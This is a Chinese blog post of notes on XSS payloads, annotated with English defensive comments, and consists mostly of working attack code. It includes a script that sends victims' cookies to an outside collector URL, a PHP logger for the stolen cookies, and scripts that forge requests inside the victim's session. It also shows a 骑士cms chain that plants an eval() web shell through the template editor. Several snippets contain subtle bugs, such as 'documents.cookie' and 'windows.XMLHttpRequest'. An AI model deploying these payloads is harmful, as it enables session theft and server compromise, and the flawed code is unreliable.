xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。
1.盗取cookie,发起cookie劫持
使用xss漏洞插入cookie.js
cookie.js代码:
// cookie.js — the cookie-exfiltration payload from the post.
// An injected <img> whose src carries the page's cookie string as a
// query-string parameter makes the victim's browser issue a plain GET to
// the collector endpoint (cookie.php below); no user interaction is needed.
// Defensive notes: a session cookie flagged HttpOnly is never exposed via
// document.cookie, so it cannot be read by this payload at all; a
// Content-Security-Policy img-src/connect-src allow-list blocks the outbound
// load; and in proxy/egress logs, an image request whose query string carries
// cookie-shaped name=value pairs to an unrelated host is a strong indicator.
var img = document.createElement("img");
// escape() URL-encodes the cookie string so it survives inside the query
// string (deprecated API, but it is what the post uses).
img.src = " www.2cto.com /cookie.php?cookie="+escape(documents.cookie);
// Attaching the element to the DOM is what triggers the request.
document.body.appendChild(img);
cookie.php代码
<?php
// cookie.php — the collector side of the payload above.
// It appends the raw `cookie` GET parameter to cookie.txt in the script's
// working directory; nothing is validated, separated or escaped, and no
// response body is produced (the <img> load simply "fails" silently in the
// victim's browser).
// Defensive notes: a PHP file that does nothing but write a request
// parameter to a local file is the typical shape of a dropped collector —
// file-integrity monitoring on the web root and alerting on new .txt files
// that grow from request traffic both surface it.
$file = fopen("cookie.txt","a");
fwrite($file,$_GET['cookie']);
fclose($file);
?>
2.构造GET和POST请求
get.js代码:
// get.js — forging a GET request from inside the victim's session.
// Loading an <img> whose src is a state-changing URL makes the browser
// issue that GET with the victim's cookies attached, exactly as a CSRF
// does, except that here the script already runs in the target origin.
// Defensive notes: state-changing actions must not be reachable via GET
// (idempotent-by-contract); SameSite cookies and anti-CSRF tokens stop
// cross-site forgery but not a same-origin XSS, so output encoding and CSP
// against the injection itself remain the primary control.
var img = document.createElement("img");
// Placeholder in the original: "a usable GET request link".
img.src = "一个可以使用的get请求链接";
document.body.appendChild(img);
post.js代码:
代码1:(DOM节点方式)
// post.js, variant 1 (DOM-node form) — build a <form method="post"> with
// DOM calls, add two fields, and submit it.
// Because the form is created inside the vulnerable page, the POST carries
// the victim's session cookies. f.action is left empty here (the browser
// posts to the current document URL) and the field names/values are
// placeholders to be replaced per target.
// Defensive notes: f.submit() is a full navigation, so the victim sees the
// page change and the server sees an ordinary form POST — the most visible
// of the three variants. Anti-CSRF tokens do not help once script runs in
// the origin (the token is readable from the DOM); preventing the XSS via
// output encoding and a CSP that forbids inline script is the control.
var f = document.createElement("form");
f.action ="";
f.method = "post";
document.body.appendChild(f);
// First field: name "xxx", value "xxxx".
var i1 = document.createElement("input");
i1.name = "xxx";
i1.value = "xxxx";
f.appendChild(i1);
// Second field: name "aaa", value "aaa".
var i2 = document.createElement("input");
i2.name = "aaa";
i2.value = "aaa";
f.appendChild(i2);
// Programmatic submit: no submit button and no user click required.
f.submit();
代码2:
// post.js, variant 2 (innerHTML form) — same effect as variant 1, but the
// form markup is written as a string into a <div> and submitted by id.
// Note the form is looked up by id="xssform" while name="mbform" is unused.
// Defensive notes: this variant is only possible where innerHTML with
// attacker-controlled markup is reachable; a CSP `script-src` without
// 'unsafe-inline' blocks the injected script that runs this, and Trusted
// Types (where supported) blocks the innerHTML sink itself.
var dd = document.createElement("div");
document.body.appendChild(dd);
// One hidden and one text input; values are placeholders.
dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';
// Programmatic submit navigates the page, like variant 1.
document.getElementById("xssform").submit();
代码3:(使用XMLHttpRequest)
// post.js, variant 3 (XMLHttpRequest) — send the POST in the background
// instead of navigating; the victim sees nothing change.
// Defensive notes: a same-origin XHR carries cookies and is, on the wire,
// indistinguishable from a legitimate form submission (same Content-Type,
// same session), so server-side detection of this variant is weak. The
// effective controls are stopping the injection (output encoding, CSP) and
// limiting what the session can do without re-authentication.
var url = "";                        // target URL placeholder
var postStr = "aaa=aaaa&xxx=xxxx";   // urlencoded body placeholder
var ajax = null;
if(windows.XMLHttpRequest)
{
    ajax = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
    ajax = new ActiveXObject("Microsoft.XMLHTTP");// IE6 and older
}
else
{
    return;
}
// Third argument true: asynchronous request.
ajax.open("POST", url , true);
ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
ajax.send(postStr);
// GET alternative left commented out in the original.
//ajax.open("GET", url, true);
//ajax.send(null);
// The response is not used; the handler body is empty apart from a
// commented-out alert.
ajax.onreadystatechange = function()
{
    if(ajax.readyState == 4 && ajax.status == 200)
    {
        //alert("Done!");
    }
}
-------------------
3.xss钓鱼
4.浏览器识别和用户安装软件识别
5.css history hack
读《白帽子讲web安全》笔记
---------------------
xss payload getshell 实例:
骑士cms getshell
// Worked example from the post: chaining an XSS seen by a logged-in
// administrator of 骑士cms into code execution. The script POSTs to the
// template editor (admin_templates.php?act=do_edit) a template body whose
// URL-decoded content is a PHP eval() of a request parameter — a one-line
// web shell — saved as footer.php in the "default" template directory.
// Defensive notes: the chain needs both an XSS reachable by an admin and a
// template editor that stores arbitrary PHP on a single POST with no
// per-request token or re-authentication. Detection: POST bodies to the
// template-edit endpoint containing "<?php" or "eval(", and file-integrity
// monitoring on the template directory; a template editor should also
// refuse executable PHP in template content, or the editor should be
// disabled in production.
// pre-built request body that writes a one-line (eval) web shell
var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';
try
{
    // obtain an XMLHttpRequest (ActiveX fallback for old IE)
    var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));
    // Third argument false: synchronous request to a relative admin URL,
    // so it rides on the admin's existing session cookies.
    xml.open("POST",'admin_templates.php?act=do_edit',false);
    xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    // The response is ignored: the handler body is empty.
    xml.onreadystatechange = function()
    {
        if(xml.readyState == 4)
        {
        }
    }
    xml.send(Shelldata);
}
catch(e)
{
    // Errors are swallowed so nothing surfaces to the victim.
}
作者 L.N的博客